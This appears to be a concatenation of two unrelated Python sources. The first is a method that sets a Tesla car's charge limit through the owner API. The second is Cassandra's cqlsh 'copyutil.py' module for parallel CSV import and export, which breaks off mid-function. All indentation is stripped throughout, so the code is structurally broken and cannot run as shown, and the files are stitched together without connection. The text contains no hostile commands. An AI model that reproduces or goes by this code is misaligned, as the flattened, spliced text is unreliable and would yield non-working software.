def apply_charge_limit(self, limit):
if self.stopTryingToApplyLimit:
return True
now = time.time()
if (
now - self.lastLimitAttemptTime <= 300
or self.carapi.getCarApiRetryRemaining(self)
):
return False
if self.ready() is False:
return False
self.lastLimitAttemptTime = now
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/command/set_charge_limit"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.carapi.getCarApiBearerToken(),
}
body = {"percent": limit}
for _ in range(0, 3):
try:
req = requests.post(url, headers=headers, json=body)
logger.log(logging.INFO8, "Car API cmd set_charge_limit " + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
result = False
reason = ""
try:
result = apiResponseDict["response"]["result"]
reason = apiResponseDict["response"]["reason"]
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
result = False
if result is True or reason == "already_set":
self.stopTryingToApplyLimit = True
self.lastAPIAccessTime = now
self.carapi.resetCarApiLastErrorTime(self)
return True
elif reason == "could_not_wake_buses":
time.sleep(5)
continue
else:
self.carapi.updateCarApiLastErrorTime(self)
return False
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ConfigParser
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from Queue import Queue
from random import randrange
from StringIO import StringIO
from select import select
from uuid import UUID
from util import profile_on, profile_off
from cassandra.cluster import Cluster
from cassandra.cqltypes import ReversedType, UserType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cql3handling import CqlRuleSet
from displaying import NO_COLOR_MAP
from formatting import format_value_default, DateTimeFormat, EMPTY, get_formatter
from sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
IS_WINDOWS = platform.system() == 'Windows'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return the normalized path but only if there is a filename, we don't want to convert
an empty string (which means no file name) to a dot. Also expand any user variables such as ~ to the full path
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg.encode(encoding))
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
None
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception, e:
printmsg('%s: %s' % (e.__class__.__name__, e.message))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in xrange(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop when the timeout specified
has been received but we may exceed it since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = ConfigParser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
return dict([(k, v.decode('string_escape') if k not in ['errfile', 'ratefile'] else v)
for k, v, in opts.iteritems()])
def parse_options(self, opts, direction):
"""
Parse options for import (COPY FROM) and export (COPY TO) operations.
Extract from opts csv and dialect options.
:return: 3 dictionaries: the csv options, the dialect options, any unrecognized options.
"""
shell = self.shell
opts = self.clean_options(self.maybe_read_config_file(opts, direction))
dialect_options = dict()
dialect_options['quotechar'] = opts.pop('quote', '"')
dialect_options['escapechar'] = opts.pop('escape', '\\')
dialect_options['delimiter'] = opts.pop('delimiter', ',')
if dialect_options['quotechar'] == dialect_options['escapechar']:
dialect_options['doublequote'] = True
del dialect_options['escapechar']
else:
dialect_options['doublequote'] = False
copy_options = dict()
copy_options['nullval'] = opts.pop('null', '')
copy_options['header'] = bool(opts.pop('header', '').lower() == 'true')
copy_options['encoding'] = opts.pop('encoding', 'utf8')
copy_options['maxrequests'] = int(opts.pop('maxrequests', 6))
copy_options['pagesize'] = int(opts.pop('pagesize', 1000))
# by default the page timeout is 10 seconds per 1000 entries
# in the page size or 10 seconds if pagesize is smaller
copy_options['pagetimeout'] = int(opts.pop('pagetimeout', max(10, 10 * (copy_options['pagesize'] / 1000))))
copy_options['maxattempts'] = int(opts.pop('maxattempts', 5))
copy_options['dtformats'] = DateTimeFormat(opts.pop('datetimeformat', shell.display_timestamp_format),
shell.display_date_format, shell.display_nanotime_format)
copy_options['float_precision'] = shell.display_float_precision
copy_options['chunksize'] = int(opts.pop('chunksize', 5000))
copy_options['ingestrate'] = int(opts.pop('ingestrate', 100000))
copy_options['maxbatchsize'] = int(opts.pop('maxbatchsize', 20))
copy_options['minbatchsize'] = int(opts.pop('minbatchsize', 10))
copy_options['reportfrequency'] = float(opts.pop('reportfrequency', 0.25))
copy_options['consistencylevel'] = shell.consistency_level
copy_options['decimalsep'] = opts.pop('decimalsep', '.')
copy_options['thousandssep'] = opts.pop('thousandssep', '')
copy_options['boolstyle'] = [s.strip() for s in opts.pop('boolstyle', 'True, False').split(',')]
copy_options['numprocesses'] = int(opts.pop('numprocesses', self.get_num_processes(16)))
copy_options['begintoken'] = opts.pop('begintoken', '')
copy_options['endtoken'] = opts.pop('endtoken', '')
copy_options['maxrows'] = int(opts.pop('maxrows', '-1'))
copy_options['skiprows'] = int(opts.pop('skiprows', '0'))
copy_options['skipcols'] = opts.pop('skipcols', '')
copy_options['maxparseerrors'] = int(opts.pop('maxparseerrors', '-1'))
copy_options['maxinserterrors'] = int(opts.pop('maxinserterrors', '-1'))
copy_options['errfile'] = safe_normpath(opts.pop('errfile', 'import_%s_%s.err' % (self.ks, self.table,)))
copy_options['ratefile'] = safe_normpath(opts.pop('ratefile', ''))
copy_options['maxoutputsize'] = int(opts.pop('maxoutputsize', '-1'))
copy_options['preparedstatements'] = bool(opts.pop('preparedstatements', 'true').lower() == 'true')
self.check_options(copy_options)
return CopyOptions(copy=copy_options, dialect=dialect_options, unrecognized=opts)
@staticmethod
def check_options(copy_options):
"""
Check any options that require a sanity check beyond a simple type conversion and if required
raise a value error:
- boolean styles must be exactly 2, they must be different and they cannot be empty
"""
bool_styles = copy_options['boolstyle']
if len(bool_styles) != 2 or bool_styles[0] == bool_styles[1] or not bool_styles[0] or not bool_styles[1]:
raise ValueError("Invalid boolean styles %s" % copy_options['boolstyle'])
@staticmethod
def get_num_processes(cap):
"""
Pick a reasonable number of child processes. We need to leave at
least one core for the parent or feeder process.
"""
return max(1, min(cap, CopyTask.get_num_cores() - 1))
@staticmethod
def get_num_cores():
"""
Return the number of cores if available. If the test environment variable
is set, then return the number carried by this variable. This is to test single-core
machine more easily.
"""
try:
num_cores_for_testing = os.environ.get('CQLSH_COPY_TEST_NUM_CORES', '')
return int(num_cores_for_testing) if num_cores_for_testing else mp.cpu_count()
except NotImplementedError:
return 1
@staticmethod
def describe_interval(seconds):
desc = []
for length, unit in ((86400, 'day'), (3600, 'hour'), (60, 'minute')):
num = int(seconds) / length
if num > 0:
desc.append('%d %s' % (num, unit))
if num > 1:
desc[-1] += 's'
seconds %= length
words = '%.03f seconds' % seconds
if len(desc) > 1:
words = ', '.join(desc) + ', and ' + words
elif len(desc) == 1:
words = desc[0] + ' and ' + words
return words
@staticmethod
def get_columns(shell, ks, table, columns):
"""
Return all columns if none were specified or only the columns specified.
Possible enhancement: introduce a regex like syntax (^) to allow users
to specify all columns except a few.
"""
return shell.get_column_names(ks, table) if not columns else columns
def close(self):
self.stop_processes()
self.inmsg.close()
self.outmsg.close()
def num_live_processes(self):
return sum(1 for p in self.processes if p.is_alive())
@staticmethod
def get_pid():
return os.getpid() if hasattr(os, 'getpid') else None
@staticmethod
def trace_process(pid):
if pid and STRACE_ON:
os.system("strace -vvvv -c -o strace.{pid}.out -e trace=all -p {pid}&".format(pid=pid))
def start_processes(self):
for i, process in enumerate(self.processes):
process.start()
self.trace_process(process.pid)
self.trace_process(self.get_pid())
def stop_processes(self):
for process in self.processes:
process.terminate()
def make_params(self):
"""
Return a dictionary of parameters to be used by the worker processes.
On Windows this dictionary must be pickle-able, therefore we do not pass the
parent connection since it may not be pickle-able. Also, on Windows child
processes are spawned and not forked, and therefore we don't need to shutdown
the parent connection anyway, see CASSANDRA-11749 for more details.
"""
shell = self.shell
return dict(ks=self.ks,
table=self.table,
local_dc=self.host.datacenter,
columns=self.columns,
options=self.options,
connect_timeout=shell.conn.connect_timeout,
hostname=self.host.address,
port=shell.port,
ssl=shell.ssl,
auth_provider=shell.auth_provider,
parent_cluster=shell.conn if not IS_WINDOWS else None,
cql_version=shell.conn.cql_version,
config_file=self.config_file,
protocol_version=self.protocol_version,
debug=shell.debug
)
def validate_columns(self):
shell = self.shell
if not self.columns:
shell.printerr("No column specified")
return False
for c in self.columns:
if c not in self.table_meta.columns:
shell.printerr('Invalid column name %s' % (c,))
return False
return True
def update_params(self, params, i):
"""
Add the communication pipes to the parameters to be passed to the worker process:
inpipe is the message pipe flowing from parent to child process, so outpipe from the parent point
of view and, vice-versa, outpipe is the message pipe flowing from child to parent, so inpipe
from the parent point of view, hence the two are swapped below.
"""
params['inpipe'] = self.outmsg.pipes[i]
params['outpipe'] = self.inmsg.pipes[i]
return params
class ExportWriter(object):
"""
A class that writes to one or more csv files, or STDOUT
"""
def __init__(self, fname, shell, columns, options):
self.fname = fname
self.shell = shell
self.columns = columns
self.options = options
self.header = options.copy['header']
self.max_output_size = long(options.copy['maxoutputsize'])
self.current_dest = None
self.num_files = 0
if self.max_output_size > 0:
if fname is not None:
self.write = self._write_with_split
self.num_written = 0
else:
shell.printerr("WARNING: maxoutputsize {} ignored when writing to STDOUT".format(self.max_output_size))
self.write = self._write_without_split
else:
self.write = self._write_without_split
def open(self):
self.current_dest = self._get_dest(self.fname)
if self.current_dest is None:
return False
if self.header:
writer = csv.writer(self.current_dest.output, **self.options.dialect)
writer.writerow(self.columns)
return True
def close(self):
self._close_current_dest()
def _next_dest(self):
self._close_current_dest()
self.current_dest = self._get_dest(self.fname + '.%d' % (self.num_files,))
def _get_dest(self, source_name):
"""
Open the output file if any or else use stdout. Return a namedtuple
containing the out and a boolean indicating if the output should be closed.
"""
CsvDest = namedtuple('CsvDest', 'output close')
if self.fname is None:
return CsvDest(output=sys.stdout, close=False)
else:
try:
ret = CsvDest(output=open(source_name, 'wb'), close=True)
self.num_files += 1
return ret
except IOError, e:
self.shell.printerr("Can't open %r for writing: %s" % (source_name, e))
return None
def _close_current_dest(self):
if self.current_dest and self.current_dest.close:
self.current_dest.output.close()
self.current_dest = None
def _write_without_split(self, data, _):
"""
Write the data to the current destination output.
"""
self.current_dest.output.write(data)
def _write_with_split(self, data, num):
"""
Write the data to the current destination output if we still
haven't reached the maximum number of rows. Otherwise split
the rows between the current destination and the next.
"""
if (self.num_written + num) > self.max_output_size:
num_remaining = self.max_output_size - self.num_written
last_switch = 0
for i, row in enumerate(filter(None, data.split(os.linesep))):
if i == num_remaining:
self._next_dest()
last_switch = i
num_remaining += self.max_output_size
self.current_dest.output.write(row + '\n')
self.num_written = num - last_switch
else:
self.num_written += num
self.current_dest.output.write(data)
class ExportTask(CopyTask):
"""
A class that exports data to .csv by instantiating one or more processes that work in parallel (ExportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'to')
options = self.options
self.begin_token = long(options.copy['begintoken']) if options.copy['begintoken'] else None
self.end_token = long(options.copy['endtoken']) if options.copy['endtoken'] else None
self.writer = ExportWriter(fname, shell, columns, options)
def run(self):
"""
Initiates the export by starting the worker processes.
Then hand over control to export_records.
"""
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY TO options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
ranges = self.get_ranges()
if not ranges:
return 0
if not self.writer.open():
return 0
columns = u"[" + u", ".join(self.columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
params = self.make_params()
for i in xrange(self.num_processes):
self.processes.append(ExportProcess(self.update_params(params, i)))
self.start_processes()
try:
self.export_records(ranges)
finally:
self.close()
def close(self):
CopyTask.close(self)
self.writer.close()
def get_ranges(self):
"""
return a queue of tuples, where the first tuple entry is a token range (from, to]
and the second entry is a list of hosts that own that range. Each host is responsible
for all the tokens in the range (from, to].
The ring information comes from the driver metadata token map, which is built by
querying System.PEERS.
We only consider replicas that are in the local datacenter. If there are no local replicas
we use the cqlsh session host.
"""
shell = self.shell
hostname = self.host.address
local_dc = self.host.datacenter
ranges = dict()
min_token = self.get_min_token()
begin_token = self.begin_token
end_token = self.end_token
def make_range(prev, curr):
"""
Return the intersection of (prev, curr) and (begin_token, end_token),
return None if the intersection is empty
"""
ret = (prev, curr)
if begin_token:
if ret[1] < begin_token:
return None
elif ret[0] < begin_token:
ret = (begin_token, ret[1])
if end_token:
if ret[0] > end_token:
return None
elif ret[1] > end_token:
ret = (ret[0], end_token)
return ret
def make_range_data(replicas=None):
hosts = []
if replicas:
for r in replicas:
if r.is_up is not False and r.datacenter == local_dc:
hosts.append(r.address)
if not hosts:
hosts.append(hostname) # fallback to default host if no replicas in current dc
return {'hosts': tuple(hosts), 'attempts': 0, 'rows': 0, 'workerno': -1}
if begin_token and begin_token < min_token:
shell.printerr('Begin token %d must be bigger or equal to min token %d' % (begin_token, min_token))
return ranges
if begin_token and end_token and begin_token > end_token:
shell.printerr('Begin token %d must be smaller than end token %d' % (begin_token, end_token))
return ranges
if shell.conn.metadata.token_map is None or min_token is None:
ranges[(begin_token, end_token)] = make_range_data()
return ranges
ring = shell.get_ring(self.ks).items()
ring.sort()
if not ring:
# If the ring is empty we get the entire ring from the host we are currently connected to
ranges[(begin_token, end_token)] = make_range_data()
elif len(ring) == 1:
# If there is only one token we get the entire ring from the replicas for that token
ranges[(begin_token, end_token)] = make_range_data(ring[0][1])
else:
# else we loop on the ring
first_range_data = None
previous = None
for token, replicas in ring:
if not first_range_data:
first_range_data = make_range_data(replicas) # we use it at the end when wrapping around
if token.value == min_token:
continue # avoids looping entire ring
current_range = make_range(previous, token.value)
if not current_range:
continue
ranges[current_range] = make_range_data(replicas)
previous = token.value
# For the last ring interval we query the same replicas that hold the first token in the ring
if previous is not None and (not end_token or previous < end_token):
ranges[(previous, end_token)] = first_range_data
if not ranges:
shell.printerr('Found no ranges to query, check begin and end tokens: %s - %s' % (begin_token, end_token))
return ranges
def get_min_token(self):
"""
:return the minimum token, which depends on the partitioner.
For partitioners that do not support tokens we return None, in
this cases we will not work in parallel, we'll just send all requests
to the cqlsh session host.
"""
partitioner = self.shell.conn.metadata.partitioner
if partitioner.endswith('RandomPartitioner'):
return -1
elif partitioner.endswith('Murmur3Partitioner'):
return -(2 ** 63) # Long.MIN_VALUE in Java
else:
return None
def send_work(self, ranges, tokens_to_send):
prev_worker_no = ranges[tokens_to_send[0]]['workerno']
i = prev_worker_no + 1 if -1 <= prev_worker_no < (self.num_processes - 1) else 0
for token_range in tokens_to_send:
ranges[token_range]['workerno'] = i
self.outmsg.channels[i].send((token_range, ranges[token_range]))
ranges[token_range]['attempts'] += 1
i = i + 1 if i < self.num_processes - 1 else 0
def export_records(self, ranges):
"""
Send records to child processes and monitor them by collecting their results
or any errors. We terminate when we have processed all the ranges or when one child
process has died (since in this case we will never get any ACK for the ranges
processed by it and at the moment we don't keep track of which ranges a
process is handling).
"""
shell = self.shell
processes = self.processes
meter = RateMeter(log_fcn=self.printmsg,
update_interval=self.options.copy['reportfrequency'],
log_file=self.options.copy['ratefile'])
total_requests = len(ranges)
max_attempts = self.options.copy['maxattempts']
self.send_work(ranges, ranges.keys())
num_processes = len(processes)
succeeded = 0
failed = 0
while (failed + succeeded) < total_requests and self.num_live_processes() == num_processes:
for token_range, result in self.inmsg.recv(timeout=0.1):
if token_range is None and result is None: # a request has finished
succeeded += 1
elif isinstance(result, Exception): # an error occurred
# This token_range failed, retry up to max_attempts if no rows received yet,
# If rows were already received we'd risk duplicating data.
# Note that there is still a slight risk of duplicating data, even if we have
# an error with no rows received yet, it's just less likely. To avoid retrying on
# all timeouts would however mean we could risk not exporting some rows.
if ranges[token_range]['attempts'] < max_attempts and ranges[token_range]['rows'] == 0:
shell.printerr('Error for %s: %s (will try again later attempt %d of %d)'
% (token_range, result, ranges[token_range]['attempts'], max_attempts))
self.send_work(ranges, [token_range])
else:
shell.printerr('Error for %s: %s (permanently given up after %d rows and %d attempts)'
% (token_range, result, ranges[token_range]['rows'],
ranges[token_range]['attempts']))
failed += 1
else: # partial result received
data, num = result
self.writer.write(data, num)
meter.increment(n=num)
ranges[token_range]['rows'] += num
if self.num_live_processes() < len(processes):
for process in processes:
if not process.is_alive():
shell.printerr('Child process %d died with exit code %d' % (process.pid, process.exitcode))
if succeeded < total_requests:
shell.printerr('Exported %d ranges out of %d total ranges, some records might be missing'
% (succeeded, total_requests))
self.printmsg("\n%d rows exported to %d files in %s." %
(meter.get_total_records(),
self.writer.num_files,
self.describe_interval(time.time() - self.time_start)))
class FilesReader(object):
"""
A wrapper around a csv reader to keep track of when we have
exhausted reading input files. We are passed a comma separated
list of paths, where each path is a valid glob expression.
We generate a source generator and we read each source one
by one.
"""
def __init__(self, fname, options):
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.fname = fname
self.sources = None # must be created later due to pickle problems on Windows
self.num_sources = 0
self.current_source = None
self.num_read = 0
def get_source(self, paths):
"""
Return a source generator. Each source is a named tuple
wrapping the source input, file name and a boolean indicating
if it requires closing.
"""
def make_source(fname):
try:
return open(fname, 'rb')
except IOError, e:
printdebugmsg("Can't open %r for reading: %s" % (fname, e))
return None
for path in paths.split(','):
path = path.strip()
if os.path.isfile(path):
yield make_source(path)
else:
for f in glob.glob(path):
yield (make_source(f))
def start(self):
self.sources = self.get_source(self.fname)
self.next_source()
@property
def exhausted(self):
return not self.current_source
def next_source(self):
"""
Close the current source, if any, and open the next one. Return true
if there is another source, false otherwise.
"""
self.close_current_source()
while self.current_source is None:
try:
self.current_source = self.sources.next()
if self.current_source:
self.num_sources += 1
except StopIteration:
return False
if self.header:
self.current_source.next()
return True
def close_current_source(self):
if not self.current_source:
return
self.current_source.close()
self.current_source = None
def close(self):
self.close_current_source()
def read_rows(self, max_rows):
if not self.current_source:
return []
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
try:
row = self.current_source.next()
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.next_source()
break
if self.num_read > self.skip_rows:
rows.append(row)
except StopIteration:
self.next_source()
break
return filter(None, rows)
class PipeReader(object):
"""
A class for reading rows received on a pipe, this is used for reading input from STDIN
"""
def __init__(self, inpipe, options):
self.inpipe = inpipe
self.chunk_size = options.copy['chunksize']
self.header = options.copy['header']
self.max_rows = options.copy['maxrows']
self.skip_rows = options.copy['skiprows']
self.num_read = 0
self.exhausted = False
self.num_sources = 1
def start(self):
pass
def read_rows(self, max_rows):
rows = []
for i in xrange(min(max_rows, self.chunk_size)):
row = self.inpipe.recv()
if row is None:
self.exhausted = True
break
self.num_read += 1
if 0 <= self.max_rows < self.num_read:
self.exhausted = True
break # max rows exceeded
if self.header or self.num_read < self.skip_rows:
self.header = False # skip header or initial skip_rows rows
continue
rows.append(row)
return rows
class ImportProcessResult(object):
"""
An object sent from ImportProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, imported=0):
self.imported = imported
class FeedingProcessResult(object):
"""
An object sent from FeedingProcess instances to the parent import task in order to indicate progress.
"""
def __init__(self, sent, reader):
self.sent = sent
self.num_sources = reader.num_sources
self.skip_rows = reader.skip_rows
class ImportTaskError(object):
"""
An object sent from child processes (feeder or workers) to the parent import task to indicate an error.
"""
def __init__(self, name, msg, rows=None, attempts=1, final=True):
self.name = name
self.msg = msg
self.rows = rows if rows else []
self.attempts = attempts
self.final = final
def is_parse_error(self):
"""
We treat read and parse errors as unrecoverable and we have different global counters for giving up when
a maximum has been reached. We consider value and type errors as parse errors as well since they
are typically non recoverable.
"""
name = self.name
return name.startswith('ValueError') or name.startswith('TypeError') or \
name.startswith('ParseError') or name.startswith('IndexError') or name.startswith('ReadError')
class ImportErrorHandler(object):
"""
A class for managing import errors
"""
def __init__(self, task):
self.shell = task.shell
self.options = task.options
self.max_attempts = self.options.copy['maxattempts']
self.max_parse_errors = self.options.copy['maxparseerrors']
self.max_insert_errors = self.options.copy['maxinserterrors']
self.err_file = self.options.copy['errfile']
self.parse_errors = 0
self.insert_errors = 0
self.num_rows_failed = 0
if os.path.isfile(self.err_file):
now = datetime.datetime.now()
old_err_file = self.err_file + now.strftime('.%Y%m%d_%H%M%S')
printdebugmsg("Renaming existing %s to %s\n" % (self.err_file, old_err_file))
os.rename(self.err_file, old_err_file)
def max_exceeded(self):
if self.insert_errors > self.max_insert_errors >= 0:
self.shell.printerr("Exceeded maximum number of insert errors %d" % self.max_insert_errors)
return True
if self.parse_errors > self.max_parse_errors >= 0:
self.shell.printerr("Exceeded maximum number of parse errors %d" % self.max_parse_errors)
return True
return False
def add_failed_rows(self, rows):
self.num_rows_failed += len(rows)
with open(self.err_file, "a") as f:
writer = csv.writer(f, **self.options.dialect)
for row in rows:
writer.writerow(row)
def handle_error(self, err):
"""
Handle an error by printing the appropriate error message and incrementing the correct counter.
"""
shell = self.shell
if err.is_parse_error():
self.parse_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up without retries"
% (len(err.rows), err.name, err.msg))
else:
if not err.final:
shell.printerr("Failed to import %d rows: %s - %s, will retry later, attempt %d of %d"
% (len(err.rows), err.name, err.msg, err.attempts, self.max_attempts))
else:
self.insert_errors += len(err.rows)
self.add_failed_rows(err.rows)
shell.printerr("Failed to import %d rows: %s - %s, given up after %d attempts"
% (len(err.rows), err.name, err.msg, err.attempts))
class ImportTask(CopyTask):
"""
A class to import data from .csv by instantiating one or more processes
that work in parallel (ImportProcess).
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file):
CopyTask.__init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, 'from')
options = self.options
self.skip_columns = [c.strip() for c in self.options.copy['skipcols'].split(',')]
self.valid_columns = [c for c in self.columns if c not in self.skip_columns]
self.receive_meter = RateMeter(log_fcn=self.printmsg,
update_interval=options.copy['reportfrequency'],
log_file=options.copy['ratefile'])
self.error_handler = ImportErrorHandler(self)
self.feeding_result = None
self.sent = 0
def make_params(self):
ret = CopyTask.make_params(self)
ret['skip_columns'] = self.skip_columns
ret['valid_columns'] = self.valid_columns
return ret
def validate_columns(self):
if not CopyTask.validate_columns(self):
return False
shell = self.shell
if not self.valid_columns:
shell.printerr("No valid column specified")
return False
for c in self.table_meta.primary_key:
if c.name not in self.valid_columns:
shell.printerr("Primary key column '%s' missing or skipped" % (c.name,))
return False
return True
def run(self):
shell = self.shell
if self.options.unrecognized:
shell.printerr('Unrecognized COPY FROM options: %s' % ', '.join(self.options.unrecognized.keys()))
return
if not self.validate_columns():
return 0
columns = u"[" + u", ".join(self.valid_columns) + u"]"
self.printmsg(u"\nStarting copy of %s.%s with columns %s." % (self.ks, self.table, columns), encoding=self.encoding)
try:
params = self.make_params()
for i in range(self.num_processes - 1):
self.processes.append(ImportProcess(self.update_params(params, i)))
feeder = FeedingProcess(self.outmsg.pipes[-1], self.inmsg.pipes[-1],
self.outmsg.pipes[:-1], self.fname, self.options,
self.shell.conn if not IS_WINDOWS else None)
self.processes.append(feeder)
self.start_processes()
pr = profile_on() if PROFILE_ON else None
self.import_records()
if pr:
profile_off(pr, file_name='parent_profile_%d.txt' % (os.getpid(),))
except Exception, exc:
shell.printerr(unicode(exc))
if shell.debug:
traceback.print_exc()
return 0
finally:
self.close()
def send_stdin_rows(self):
"""
We need to pass stdin rows to the feeder process as it is not safe to pickle or share stdin
directly (in case of file the child process would close it). This is a very primitive support
for STDIN import in that we we won't start reporting progress until STDIN is fully consumed. I
think this is reasonable.
"""
shell = self.shell
self.printmsg("[Use . on a line by itself to end input]")
for row in shell.use_stdin_reader(prompt='[copy] ', until=r'.'):
self.outmsg.channels[-1].send(row)
self.outmsg.channels[-1].send(None)
if shell.tty:
print
def import_records(self):
"""
Keep on running until we have stuff to receive or send and until all processes are running.
Send data (batches or retries) up to the max ingest rate. If we are waiting for stuff to
receive check the incoming queue.
"""
if not self.fname:
self.send_stdin_rows()
while self.feeding_result is None or self.receive_meter.total_records < self.feeding_result.sent:
self.receive_results()
if self.error_handler.max_exceeded() or not self.all_processes_running():
break
if self.error_handler.num_rows_failed:
self.shell.printerr("Failed to process %d rows; failed rows written to %s" %
(self.error_handler.num_rows_failed,
self.error_handler.err_file))
if not self.all_processes_running():
self.shell.printerr("{} child process(es) died unexpectedly, aborting"
.format(self.num_processes - self.num_live_processes()))
else:
if self.error_handler.max_exceeded():
self.processes[-1].terminate() # kill the feeder
